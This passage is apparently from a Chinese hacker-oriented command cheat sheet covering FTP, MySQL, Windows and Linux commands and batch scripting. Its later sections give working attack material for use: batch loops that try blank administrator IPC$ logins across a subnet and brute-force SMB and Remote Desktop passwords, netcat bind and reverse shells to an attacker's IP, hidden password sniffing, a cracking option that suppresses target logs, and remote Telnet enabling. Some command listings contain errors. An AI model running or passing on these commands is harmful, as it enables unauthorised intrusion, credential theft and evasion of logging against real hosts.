<BR>put&nbsp;或&nbsp;send&nbsp;本地文件名&nbsp;[上传到主机上的文件名]&nbsp;将本地一个文件传送至远端主机中&nbsp; <BR>get&nbsp;或&nbsp;recv&nbsp;[远程主机文件名]&nbsp;[下载到本地后的文件名]&nbsp;从远端主机中传送至本地主机中&nbsp; <BR>mget&nbsp;[remote-files]&nbsp;从远端主机接收一批文件至本地主机&nbsp; <BR>mput&nbsp;local-files&nbsp;将本地主机中一批文件传送至远端主机&nbsp; <BR>dir&nbsp;或&nbsp;ls&nbsp;[remote-directory]&nbsp;[local-file]&nbsp;列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件&nbsp; <BR>ascii&nbsp;设定以ASCII方式传送文件(缺省值)&nbsp; <BR>bin&nbsp;或&nbsp;image&nbsp;设定以二进制方式传送文件&nbsp; <BR>bell&nbsp;每完成一次文件传送,报警提示&nbsp; <BR>cdup&nbsp;返回上一级目录&nbsp; <BR>close&nbsp;中断与远程服务器的ftp会话(与open对应)&nbsp; <BR>open&nbsp;host[port]&nbsp;建立指定ftp服务器连接,可指定连接端口&nbsp; <BR>delete&nbsp;删除远端主机中的文件&nbsp; <BR>mdelete&nbsp;[remote-files]&nbsp;删除一批文件&nbsp; <BR>mkdir&nbsp;directory-name&nbsp;在远端主机中建立目录&nbsp; <BR>rename&nbsp;[from]&nbsp;[to]&nbsp;改变远端主机中的文件名&nbsp; <BR>rmdir&nbsp;directory-name&nbsp;删除远端主机中的目录&nbsp; <BR>status&nbsp;显示当前FTP的状态&nbsp; <BR>system&nbsp;显示远端主机系统类型&nbsp; <BR>user&nbsp;user-name&nbsp;[password]&nbsp;[account]&nbsp;重新以别的用户名登录远端主机&nbsp; <BR>open&nbsp;host&nbsp;[port]&nbsp;重新建立一个新的连接&nbsp; <BR>prompt&nbsp;交互提示模式&nbsp; <BR>macdef&nbsp;定义宏命令&nbsp; <BR>lcd&nbsp;改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录&nbsp; <BR>chmod&nbsp;改变远端主机的文件权限&nbsp; <BR>case&nbsp;当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母&nbsp; <BR>cd&nbsp;remote－dir&nbsp;进入远程主机目录&nbsp; <BR>cdup&nbsp;进入远程主机目录的父目录&nbsp; <BR>!&nbsp;在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip <BR><BR>#5&nbsp;五： <BR><BR>MYSQL&nbsp;命令：&nbsp; <BR>mysql&nbsp;-h主机地址&nbsp;-u用户名&nbsp;－p密码&nbsp;连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。 <BR>（例：mysql&nbsp;-h110.110.110.110&nbsp;-Uroot&nbsp;-P123456&nbsp; <BR>注:u与root可以不用加空格，其它也一样）&nbsp; <BR>exit&nbsp;退出MYSQL&nbsp; <BR>mysqladmin&nbsp;-u用户名&nbsp;-p旧密码&nbsp;password&nbsp;新密码&nbsp;修改密码&nbsp; <BR>grant&nbsp;select&nbsp;on&nbsp;数据库.*&nbsp;to&nbsp;用户名@登录主机&nbsp;identified&nbsp;by&nbsp;\"密码\";&nbsp;增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）&nbsp; <BR>show&nbsp;databases;&nbsp;显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。&nbsp; <BR>use&nbsp;mysql； <BR>show&nbsp;tables;&nbsp;显示库中的数据表&nbsp; <BR>describe&nbsp;表名;&nbsp;显示数据表的结构&nbsp; <BR>create&nbsp;database&nbsp;库名;&nbsp;建库&nbsp; <BR>use&nbsp;库名； <BR>create&nbsp;table&nbsp;表名&nbsp;(字段设定列表)；&nbsp;建表&nbsp; <BR>drop&nbsp;database&nbsp;库名;&nbsp; <BR>drｏp&nbsp;table&nbsp;表名；&nbsp;删库和删表&nbsp; <BR>delｅte&nbsp;from&nbsp;表名;&nbsp;将表中记录清空&nbsp; <BR>select&nbsp;*&nbsp;from&nbsp;表名;&nbsp;显示表中的记录&nbsp; <BR>mysqldump&nbsp;--opt&nbsp;school&gt;school.bbb&nbsp;备份数据库：（命令在DOS的\\mysql\\bin目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。&nbsp; <BR>win2003系统下新增命令（实用部份）：&nbsp; <BR>shutdown&nbsp;/参数&nbsp;关闭或重启本地或远程主机。 <BR>参数说明：/S&nbsp;关闭主机，/R&nbsp;重启主机，&nbsp;/T&nbsp;数字&nbsp;设定延时的时间，范围0～180秒之间，&nbsp;/A取消开机，/M&nbsp;//IP&nbsp;指定的远程主机。 <BR>例：shutdown&nbsp;/r&nbsp;/t&nbsp;0&nbsp;立即重启本地主机（无延时）&nbsp; <BR>taskill&nbsp;/参数&nbsp;进程名或进程的pid&nbsp;终止一个或多个任务和进程。 <BR>参数说明：/PID&nbsp;要终止进程的pid,可用tasklist命令获得各进程的pid，/IM&nbsp;要终止的进程的进程名，/F&nbsp;强制终止进程，/T&nbsp;终止指定的进程及他所启动的子进程。&nbsp; <BR>tasklist&nbsp;显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。 <BR>参数说明：/M&nbsp;列出当前进程加载的dll文件，/SVC&nbsp;显示出每个进程对应的服务，无参数时就只列出当前的进程。 <BR><BR>#6&nbsp;六： <BR><BR>Linux系统下基本命令：&nbsp;要区分大小写&nbsp; <BR>uname&nbsp;显示版本信息（同win2K的&nbsp;ver）&nbsp; <BR>dir&nbsp;显示当前目录文件,ls&nbsp;-al&nbsp;显示包括隐藏文件（同win2K的&nbsp;dir）&nbsp; <BR>pwd&nbsp;查询当前所在的目录位置&nbsp; <BR>cd&nbsp;cd　..回到上一层目录，注意cd&nbsp;与..之间有空格。cd　/返回到根目录。&nbsp; <BR>cat&nbsp;文件名&nbsp;查看文件内容&nbsp; <BR>cat&nbsp;&gt;abc.txt&nbsp;往abc.txt文件中写上内容。&nbsp; <BR>more&nbsp;文件名&nbsp;以一页一页的方式显示一个文本文件。&nbsp; <BR>cp&nbsp;复制文件&nbsp; <BR>mv&nbsp;移动文件&nbsp; <BR>rm&nbsp;文件名&nbsp;删除文件，rm&nbsp;-a&nbsp;目录名删除目录及子目录&nbsp; <BR>mkdir&nbsp;目录名&nbsp;建立目录&nbsp; <BR>rmdir&nbsp;删除子目录，目录内没有文档。&nbsp; <BR>chmod&nbsp;设定档案或目录的存取权限&nbsp; <BR>grep&nbsp;在档案中查找字符串&nbsp; <BR>diff&nbsp;档案文件比较&nbsp; <BR>find&nbsp;档案搜寻&nbsp; <BR>date&nbsp;现在的日期、时间&nbsp; <BR>who&nbsp;查询目前和你使用同一台机器的人以及Login时间地点&nbsp; <BR>w&nbsp;查询目前上机者的详细资料&nbsp; <BR>whoami&nbsp;查看自己的帐号名称&nbsp; <BR>groups&nbsp;查看某人的Group&nbsp; <BR>passwd&nbsp;更改密码&nbsp; <BR>history&nbsp;查看自己下过的命令&nbsp; <BR>ps&nbsp;显示进程状态&nbsp; <BR>kill&nbsp;停止某进程&nbsp; <BR>gcc&nbsp;黑客通常用它来编译C语言写的文件&nbsp; <BR>su&nbsp;权限转换为指定使用者&nbsp; <BR>telnet&nbsp;IP&nbsp;telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。&nbsp; <BR>ftp&nbsp;ftp连接上某服务器（同win2K）&nbsp; <BR><BR>附：批处理命令与变量 <BR><BR>1：for命令及变量&nbsp;基本格式：&nbsp; <BR>FOR&nbsp;/参数&nbsp;%variable&nbsp;IN&nbsp;(set)&nbsp;DO&nbsp;command&nbsp;[command_parameters]&nbsp;%variable:指定一个单一字母可替换的参数，如：%i&nbsp;，而指定一个变量则用：%%i&nbsp;，而调用变量时用：%i%&nbsp;，变量是区分大小写的（%i&nbsp;不等于&nbsp;%I）。 <BR>批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net&nbsp;use&nbsp;\\ip\ipc$&nbsp;pass&nbsp;/user:user&nbsp;中ip为%1,pass为%2&nbsp;,user为%3 <BR><BR>(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1&nbsp;1&nbsp;254)(1&nbsp;-1&nbsp;254),{&nbsp;“(1&nbsp;1&nbsp;254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1&nbsp;-1&nbsp;254)”说明：即从254到1&nbsp;} <BR><BR>command：指定对第个文件执行的命令，如：net&nbsp;use命令；如要执行多个命令时，命令这间加：&amp;&nbsp;来隔开 <BR>command_parameters：为特定命令指定参数或命令行开关 <BR><BR>IN&nbsp;(set)：指在(set)中取值；DO&nbsp;command&nbsp;：指执行command <BR><BR>参数：/L&nbsp;指用增量形式{&nbsp;(set)为增量形式时&nbsp;}；/F&nbsp;指从文件中不断取值，直到取完为止{&nbsp;(set)为文件时，如(d:\pass.txt)时&nbsp;}。&nbsp; <BR>用法举例：&nbsp; <BR>@echo&nbsp;off&nbsp; <BR>echo&nbsp;用法格式：test.bat&nbsp;*.*.*&nbsp;&gt;&nbsp;test.txt&nbsp; <BR><BR>for&nbsp;/L&nbsp;%%G&nbsp;in&nbsp;(1&nbsp;1&nbsp;254)&nbsp;do&nbsp;echo&nbsp;%1.%%G&nbsp;&gt;&gt;test.txt&nbsp;&amp;&nbsp;net&nbsp;use&nbsp;\\%1.%%G&nbsp;/user:administrator&nbsp;|&nbsp;find&nbsp;"命令成功完成"&nbsp;&gt;&gt;test.txt&nbsp; <BR>存为test.bat&nbsp;说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。 <BR><BR>/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的&nbsp;%1；%%G&nbsp;为变量(ip的最后一位）；&amp;&nbsp;用来隔开echo&nbsp;和net&nbsp;use&nbsp;这二个命令；|&nbsp;指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G&nbsp;为完整的IP地址；(1&nbsp;1&nbsp;254)&nbsp;指起始值，增长量，结止值。&nbsp; <BR>@echo&nbsp;off&nbsp; <BR>echo&nbsp;用法格式：ok.bat&nbsp;ip&nbsp; <BR>FOR&nbsp;/F&nbsp;%%i&nbsp;IN&nbsp;(D:\user.dic)&nbsp;DO&nbsp;smb.exe&nbsp;%1&nbsp;%%i&nbsp;D:\pass.dic&nbsp;200&nbsp; <BR>存为：ok.exe&nbsp;说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。 <BR><BR>#7&nbsp;七： <BR><BR>2：if命令及变量&nbsp;基本格式：&nbsp; <BR>IF&nbsp;[not]&nbsp;errorlevel&nbsp;数字&nbsp;命令语句&nbsp;如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。 <BR>例：IF&nbsp;errorlevel&nbsp;0&nbsp;命令&nbsp;指程序执行后返回的值为0时，就值行后面的命令；IF&nbsp;not&nbsp;errorlevel&nbsp;1&nbsp;命令指程序执行最后返回的值不等于1，就执行后面的命令。 <BR>0&nbsp;指发现并成功执行（真）；1&nbsp;指没有发现、没执行（假）。&nbsp; <BR>IF&nbsp;[not]&nbsp;字符串1==字符串2&nbsp;命令语句&nbsp;如果指定的文本字符串匹配（即：字符串1&nbsp;等于&nbsp;字符串2），就执行后面的命令。 <BR>例：“if&nbsp;"%2%"=="4"&nbsp;goto&nbsp;start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加"&nbsp;"）&nbsp; <BR>IF&nbsp;[not]&nbsp;exist&nbsp;文件名&nbsp;命令语句&nbsp;如果指定的文件名存在，就执行后面的命令。 <BR>例：“if&nbsp;not&nbsp;nc.exe&nbsp;goto&nbsp;end”指：如果没有发现nc.exe文件就跳到":end"标签处。&nbsp; <BR>IF&nbsp;[not]&nbsp;errorlevel&nbsp;数字&nbsp;命令语句&nbsp;else&nbsp;命令语句或&nbsp;IF&nbsp;[not]&nbsp;字符串1==字符串2&nbsp;命令语句&nbsp;else&nbsp;命令语句或&nbsp;IF&nbsp;[not]&nbsp;exist&nbsp;文件名&nbsp;命令语句&nbsp;else&nbsp;命令语句&nbsp;加上：else&nbsp;命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else&nbsp;必须与&nbsp;if&nbsp;在同一行才有效。&nbsp;当有del命令时需把del命令全部内容用&lt;&nbsp;&gt;括起来，因为del命令要单独一行时才能执行，用上&lt;&nbsp;&gt;后就等于是单独一行了；例如：“if&nbsp;exist&nbsp;test.txt.&nbsp;&lt;del&nbsp;test.txt.&gt;&nbsp;else&nbsp;echo&nbsp;test.txt.missing&nbsp;”，注意命令中的“.”&nbsp; <BR><BR>（二）系统外部命令(均需下载相关工具)： <BR><BR>1、瑞士军刀：nc.exe <BR><BR>参数说明：&nbsp; <BR>-h&nbsp;查看帮助信息&nbsp; <BR>-d&nbsp;后台模式&nbsp; <BR>-e&nbsp;prog程序重定向，一但连接就执行［危险］&nbsp; <BR>-i&nbsp;secs延时的间隔&nbsp; <BR>-l&nbsp;监听模式，用于入站连接&nbsp; <BR>-L&nbsp;监听模式，连接天闭后仍然继续监听，直到CTR+C&nbsp; <BR>-n&nbsp;IP地址，不能用域名&nbsp; <BR>-o&nbsp;film记录16进制的传输&nbsp; <BR>-p[空格]端口&nbsp;本地端口号&nbsp; <BR>-r&nbsp;随机本地及远程端口&nbsp; <BR>-t&nbsp;使用Telnet交互方式&nbsp; <BR>-u&nbsp;UDP模式&nbsp; <BR>-v&nbsp;详细输出，用-vv将更详细&nbsp; <BR>-w数字&nbsp;timeout延时间隔&nbsp; <BR>-z&nbsp;将输入，输出关掉（用于扫锚时）&nbsp; <BR>基本用法：&nbsp; <BR>nc&nbsp;-nvv&nbsp;192.168.0.1&nbsp;80&nbsp;连接到192.168.0.1主机的80端口&nbsp; <BR>nc&nbsp;-l&nbsp;-p&nbsp;80&nbsp;开启本机的TCP&nbsp;80端口并监听&nbsp; <BR>nc&nbsp;-nvv&nbsp;-w2&nbsp;-z&nbsp;192.168.0.1&nbsp;80-1024&nbsp;扫锚192.168.0.1的80-1024端口&nbsp; <BR>nc&nbsp;-l&nbsp;-p&nbsp;5354&nbsp;-t&nbsp;-e&nbsp;c:winntsystem32cmd.exe&nbsp;绑定remote主机的cmdshell在remote的TCP&nbsp;5354端口&nbsp; <BR>nc&nbsp;-t&nbsp;-e&nbsp;c:winntsystem32cmd.exe&nbsp;192.168.0.2&nbsp;5354&nbsp;梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口&nbsp; <BR>高级用法：&nbsp; <BR>nc&nbsp;-L&nbsp;-p&nbsp;80&nbsp;作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止&nbsp; <BR>nc&nbsp;-L&nbsp;-p&nbsp;80&nbsp;&gt;&nbsp;c:\log.txt&nbsp;作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:\log.txt&nbsp; <BR>nc&nbsp;-L&nbsp;-p&nbsp;80&nbsp;&lt;&nbsp;c:\honeyport.txt&nbsp;作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用&nbsp; <BR>type.exe&nbsp;c:\honeyport&nbsp;|&nbsp;nc&nbsp;-L&nbsp;-p&nbsp;80&nbsp;作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用&nbsp; <BR>本机上用：nc&nbsp;-l&nbsp;-p&nbsp;本机端口&nbsp; <BR>在对方主机上用：nc&nbsp;-e&nbsp;cmd.exe&nbsp;本机IP&nbsp;-p&nbsp;本机端口&nbsp;*win2K <BR>nc&nbsp;-e&nbsp;/bin/sh&nbsp;本机IP&nbsp;-p&nbsp;本机端口&nbsp;*linux,unix&nbsp;反向连接突破对方主机的防火墙&nbsp; <BR>本机上用：nc&nbsp;-d&nbsp;-l&nbsp;-p&nbsp;本机端口&nbsp;&lt;&nbsp;要传送的文件路径及名称&nbsp; <BR>在对方主机上用：nc&nbsp;-vv&nbsp;本机IP&nbsp;本机端口&nbsp;&gt;&nbsp;存放文件的路径及名称&nbsp;传送文件到对方主机&nbsp; <BR>备&nbsp;注：&nbsp; <BR>|&nbsp;管道命令&nbsp; <BR>&lt;&nbsp;或&nbsp;&gt;&nbsp;重定向命令。“&lt;”，例如：tlntadmn&nbsp;&lt;&nbsp;test.txt&nbsp;指把test.txt的内容赋值给tlntadmn命令&nbsp; <BR>＠&nbsp;表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir&nbsp;c:\winnt&nbsp;&gt;&gt;&nbsp;d:\log.txt&nbsp;意思是：后台执行dir，并把结果存在d:\log.txt中&nbsp; <BR>&gt;与&gt;&gt;的区别&nbsp;　"&gt;"指：覆盖；"&gt;&gt;"指：保存到(添加到）。 <BR>如：@dir&nbsp;c:\winnt&nbsp;&gt;&gt;&nbsp;d:\log.txt和@dir&nbsp;c:\winnt&nbsp;&gt;&nbsp;d:\log.txt二个命令分别执行二次比较看：用&gt;&gt;的则是把二次的结果都保存了，而用：&gt;则只有一次的结果，是因为第二次的结果把第一次的覆盖了。 <BR><BR>#8&nbsp;八： <BR><BR>2、扫锚工具：xscan.exe <BR><BR>基本格式&nbsp; <BR>xscan&nbsp;-host&nbsp;&lt;起始IP&gt;[-&lt;终止IP&gt;]&nbsp;&lt;检测项目&gt;&nbsp;[其他选项]&nbsp;扫锚"起始IP到终止IP"段的所有主机信息&nbsp; <BR>xscan&nbsp;-file&nbsp;&lt;主机列表文件名&gt;&nbsp;&lt;检测项目&gt;&nbsp;[其他选项]&nbsp;扫锚"主机IP列表文件名"中的所有主机信息&nbsp; <BR>检测项目&nbsp; <BR>-active&nbsp;检测主机是否存活&nbsp; <BR>-os&nbsp;检测远程操作系统类型（通过NETBIOS和SNMP协议）&nbsp; <BR>-port&nbsp;检测常用服务的端口状态&nbsp; <BR>-ftp&nbsp;检测FTP弱口令&nbsp; <BR>-pub&nbsp;检测FTP服务匿名用户写权限&nbsp; <BR>-pop3&nbsp;检测POP3-Server弱口令&nbsp; <BR>-smtp&nbsp;检测SMTP-Server漏洞&nbsp; <BR>-sql&nbsp;检测SQL-Server弱口令&nbsp; <BR>-smb&nbsp;检测NT-Server弱口令&nbsp; <BR>-iis&nbsp;检测IIS编码/解码漏洞&nbsp; <BR>-cgi&nbsp;检测CGI漏洞&nbsp; <BR>-nasl&nbsp;加载Nessus攻击脚本&nbsp; <BR>-all&nbsp;检测以上所有项目&nbsp; <BR>其它选项&nbsp; <BR>-i&nbsp;适配器编号&nbsp;设置网络适配器,&nbsp;&lt;适配器编号&gt;可通过"-l"参数获取&nbsp; <BR>-l&nbsp;显示所有网络适配器&nbsp; <BR>-v&nbsp;显示详细扫描进度&nbsp; <BR>-p&nbsp;跳过没有响应的主机&nbsp; <BR>-o&nbsp;跳过没有检测到开放端口的主机&nbsp; <BR>　&nbsp;-t&nbsp;并发线程数量,并发主机数量&nbsp;指定最大并发线程数量和并发主机数量,&nbsp;默认数量为100,10&nbsp; <BR>-log&nbsp;文件名&nbsp;指定扫描报告文件名&nbsp;(后缀为：TXT或HTML格式的文件)&nbsp; <BR>用法示例&nbsp; <BR>xscan&nbsp;-host&nbsp;192.168.1.1-192.168.255.255&nbsp;-all&nbsp;-active&nbsp;-p　&nbsp;检测192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机&nbsp; <BR>xscan&nbsp;-host&nbsp;192.168.1.1-192.168.255.255&nbsp;-port&nbsp;-smb&nbsp;-t&nbsp;150&nbsp;-o&nbsp;检测192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大并发线程数量为150，跳过没有检测到开放端口的主机&nbsp; <BR>xscan&nbsp;-file&nbsp;hostlist.txt&nbsp;-port&nbsp;-cgi&nbsp;-t&nbsp;200,5&nbsp;-v&nbsp;-o&nbsp;检测“hostlist.txt”文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机 <BR><BR>#9&nbsp;九： <BR><BR>3、命令行方式嗅探器:&nbsp;xsniff.exe <BR>可捕获局域网内FTP/SMTP/POP3/HTTP协议密码 <BR>参数说明&nbsp; <BR>-tcp&nbsp;输出TCP数据报&nbsp; <BR>-udp&nbsp;输出UDP数据报&nbsp; <BR>-icmp&nbsp;输出ICMP数据报&nbsp; <BR>-pass&nbsp;过滤密码信息&nbsp; <BR>-hide&nbsp;后台运行&nbsp; <BR>-host&nbsp;解析主机名&nbsp; <BR>-addr&nbsp;IP地址&nbsp;过滤IP地址&nbsp; <BR>-port&nbsp;端口&nbsp;过滤端口&nbsp; <BR>-log&nbsp;文件名&nbsp;将输出保存到文件&nbsp; <BR>-asc&nbsp;以ASCII形式输出&nbsp; <BR>-hex&nbsp;以16进制形式输出&nbsp; <BR>用法示例&nbsp; <BR>xsniff.exe&nbsp;-pass&nbsp;-hide&nbsp;-log&nbsp;pass.log&nbsp;后台运行嗅探密码并将密码信息保存在pass.log文件中&nbsp; <BR>xsniff.exe&nbsp;-tcp&nbsp;-udp&nbsp;-asc&nbsp;-addr&nbsp;192.168.1.1&nbsp;嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出&nbsp; <BR><BR>4、终端服务密码破解:&nbsp;tscrack.exe <BR><BR>参数说明&nbsp; <BR>-h&nbsp;显示使用帮助&nbsp; <BR>-v&nbsp;显示版本信息&nbsp; <BR>-s&nbsp;在屏幕上打出解密能力&nbsp; <BR>-b&nbsp;密码错误时发出的声音&nbsp; <BR>-t&nbsp;同是发出多个连接（多线程）&nbsp; <BR>-N&nbsp;Prevent&nbsp;System&nbsp;Log&nbsp;entries&nbsp;on&nbsp;targeted&nbsp;server&nbsp; <BR>-U&nbsp;卸载移除tscrack组件&nbsp; <BR>-f&nbsp;使用－f后面的密码&nbsp; <BR>-F&nbsp;间隔时间（频率）&nbsp; <BR>-l&nbsp;使用－l后面的用户名&nbsp; <BR>-w&nbsp;使用－w后面的密码字典&nbsp; <BR>-p&nbsp;使用－p后面的密码&nbsp; <BR>-D&nbsp;登录主页面&nbsp; <BR>用法示例&nbsp; <BR>tscrack&nbsp;192.168.0.1&nbsp;-l&nbsp;administrator&nbsp;-w&nbsp;pass.dic&nbsp;远程用密码字典文件暴破主机的administrator的登陆密码&nbsp; <BR>tscrack&nbsp;192.168.0.1&nbsp;-l&nbsp;administrator&nbsp;-p&nbsp;123456&nbsp;用密码123456远程登陆192.168.0.1的administrator用户&nbsp; <BR>@if&nbsp;not&nbsp;exist&nbsp;ipcscan.txt&nbsp;goto&nbsp;noscan&nbsp; <BR>@for&nbsp;/f&nbsp;"tokens=1&nbsp;delims=&nbsp;"&nbsp;%%i&nbsp;in&nbsp;(3389.txt)&nbsp;do&nbsp;call&nbsp;hack.bat&nbsp;%%i&nbsp; <BR>nscan&nbsp; <BR>@echo&nbsp;3389.txt&nbsp;no&nbsp;find&nbsp;or&nbsp;scan&nbsp;faild&nbsp; <BR>(①存为3389.bat)&nbsp;（假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)&nbsp; <BR>3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat&nbsp; <BR>@if&nbsp;not&nbsp;exist&nbsp;tscrack.exe&nbsp;goto&nbsp;noscan&nbsp; <BR>@tscrack&nbsp;%1&nbsp;-l&nbsp;administrator&nbsp;-w&nbsp;pass.dic&nbsp;&gt;&gt;rouji.txt&nbsp; <BR>:noscan&nbsp; <BR>@echo&nbsp;tscrack.exe&nbsp;no&nbsp;find&nbsp;or&nbsp;scan&nbsp;faild&nbsp; <BR>(②存为hack.bat)&nbsp;(运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下；就可以等待结果了)&nbsp; <BR>hack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码，并将破解结果保存在rouji.txt文件中。&nbsp; <BR><BR>5、其它： <BR><BR>Shutdown.exe&nbsp; <BR>Shutdown&nbsp;\\IP地址&nbsp;t:20&nbsp;20秒后将对方NT自动关闭（Windows&nbsp;2003系统自带工具，在Windows2000下用进就得下载此工具才能用。在前面Windows&nbsp;2003&nbsp;DOS命令中有详细介绍。）&nbsp; <BR>fpipe.exe&nbsp;(TCP端口重定向工具)&nbsp;在第二篇中有详细说明（端口重定向绕过防火墙）&nbsp; <BR>fpipe&nbsp;-l&nbsp;80&nbsp;-s&nbsp;1029&nbsp;-r&nbsp;80&nbsp;www.sina.com.cn&nbsp;当有人扫锚你的80端口时，他扫到的结果会完全是www.sina.com.cn的主机信息&nbsp; <BR>Fpipe&nbsp;-l&nbsp;23&nbsp;-s&nbsp;88&nbsp;-r&nbsp;23&nbsp;目标IP&nbsp;把本机向目标IP发送的23端口Telnet请求经端口重定向后，就通过88端口发送到目标IP的23端口。（与目标IP建立Telnet时本机就用的88端口与其相连接）然后：直接Telnet&nbsp;127.0.0.1（本机IP）就连接到目标IP的23端口了。&nbsp; <BR>OpenTelnet.exe&nbsp;(远程开启telnet工具)&nbsp; <BR>opentelnet.exe&nbsp;\\IP&nbsp;帐号　密码　ntlm认证方式　Telnet端口&nbsp;（不需要上传ntlm.exe破坏微软的身份验证方式）直接远程开启对方的telnet服务后，就可用telnet&nbsp;\\ip&nbsp;连接上对方。 <BR>NTLM认证方式：０：不使用NTLM身份验证；１：先尝试NTLM身份验证，如果失败，再使用用户名和密码；２：只使用NTLM身份验证。 <BR><BR>ResumeTelnet.exe&nbsp;(OpenTelnet附带的另一个工具)&nbsp; <BR>resumetelnet.exe&nbsp;\\IP　帐号　密码&nbsp;用Telnet连接完对方后，就用这个命令将对方的Telnet设置还原，并同时关闭Telnet服务。 <BR><BR>#10&nbsp;十： <BR><BR>6、FTP命令详解： <BR><BR>FTP命令是Internet用户使用最频繁的命令之一，熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。如果你想学习使用进行后台FTP下载，那么就必须学习FTP指令。 <BR><BR>FTP的命令行格式为：&nbsp; <BR>ftp&nbsp;-v&nbsp;-d&nbsp;-i&nbsp;-n&nbsp;-g&nbsp;[主机名]&nbsp;，其中 <BR><BR>-v&nbsp;显示远程服务器的所有响应信息； <BR><BR>-n&nbsp;限制ftp的自动登录，即不使用；.n&nbsp;etrc文件； <BR><BR>-d&nbsp;使用调试方式； <BR><BR>-g&nbsp;取消全局文件名。 <BR><BR>FTP使用的内部命令如下(中括号表示可选项): <BR><BR>1.![cmd[args]]：在本地机中执行交互shell，exit回到ftp环境，如：!ls*.zip&nbsp; <BR>2.$&nbsp;macro-ame[args]：&nbsp;执行宏定义macro-name。 <BR><BR>3.account[password]：&nbsp;提供登录远程系统成功后访问系统资源所需的补充口令。&nbsp; <BR>4.append&nbsp;local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。 <BR><BR>5.ascii：使用ascii类型传输方式。 <BR>6.bell：每个命令执行完毕后计算机响铃一次。 <BR><BR>7.bin：使用二进制文件传输方式。 <BR>8.bye：退出ftp会话过程。 <BR><BR>9.case：在使用mget时，将远程主机文件名中的大写转为小写字母。&nbsp; <BR>10.cd&nbsp;remote-dir：进入远程主机目录。 <BR><BR>11.cdup：进入远程主机目录的父目录。&nbsp; <BR>12.chmod&nbsp;mode&nbsp;file-name：将远程主机文件file-name的存取方式设置为mode，如：chmod&nbsp;777&nbsp;a.out。 <BR><BR>13.close：中断与远程服务器的ftp会话(与open对应)。&nbsp; <BR>14.cr：使用asscii方式传输文件时，将回车换行转换为回行。 <BR><BR>15.delete&nbsp;remote-file：删除远程主机文件。&nbsp; <BR>16.debug[debug-value]：设置调试方式，&nbsp;显示发送至远程主机的每条命令，如：deb&nbsp;up&nbsp;3，若设为0，表示取消debug。 <BR><BR>17.dir[remote-dir][local-file]：显示远程主机目录，并将结果存入本地文件。&nbsp; <BR>18.disconnection：同close。 <BR><BR>19.form&nbsp;format：将文件传输方式设置为format，缺省为file方式。&nbsp; <BR>20.get&nbsp;remote-file[local-file]：&nbsp;将远程主机的文件remote-file传至本地硬盘的local-file。 <BR><BR>21.glob：设置mdelete，mget，mput的文件名扩展，缺省时不扩展文件名，同命令行的-g参数。&nbsp; <BR>22.hash：每传输1024字节，显示一个hash符号(#)。 <BR><BR>23.help[cmd]：显示ftp内部命令cmd的帮助信息，如：help&nbsp;get。&nbsp; <BR>24.idle[seconds]：将远程服务器的休眠计时器设为[seconds]秒。 <BR><BR>25.image：设置二进制传输方式(同binary)。&nbsp; <BR>26.lcd[dir]：将本地工作目录切换至dir。 <BR><BR>27.ls[remote-dir][local-file]：显示远程目录remote-dir，&nbsp;并存入本地文件local-file。&nbsp; <BR>28.macdef&nbsp;macro-name：定义一个宏，遇到macdef下的空行时，宏定义结束。 <BR><BR>29.mdelete[remote-file]：删除远程主机文件。&nbsp; <BR>30.mdir&nbsp;remote-files&nbsp;local-file：与dir类似，但可指定多个远程文件，如&nbsp;：mdir&nbsp;*.o.*.zipoutfile&nbsp;。 <BR><BR>31.mget&nbsp;remote-files：传输多个远程文件。&nbsp; <BR>32.mkdir&nbsp;dir-name：在远程主机中建一目录。 <BR><BR>33.mls&nbsp;remote-file&nbsp;local-file：同nlist，但可指定多个文件名。&nbsp; <BR>34.mode[modename]：将文件传输方式设置为modename，&nbsp;缺省为stream方式。 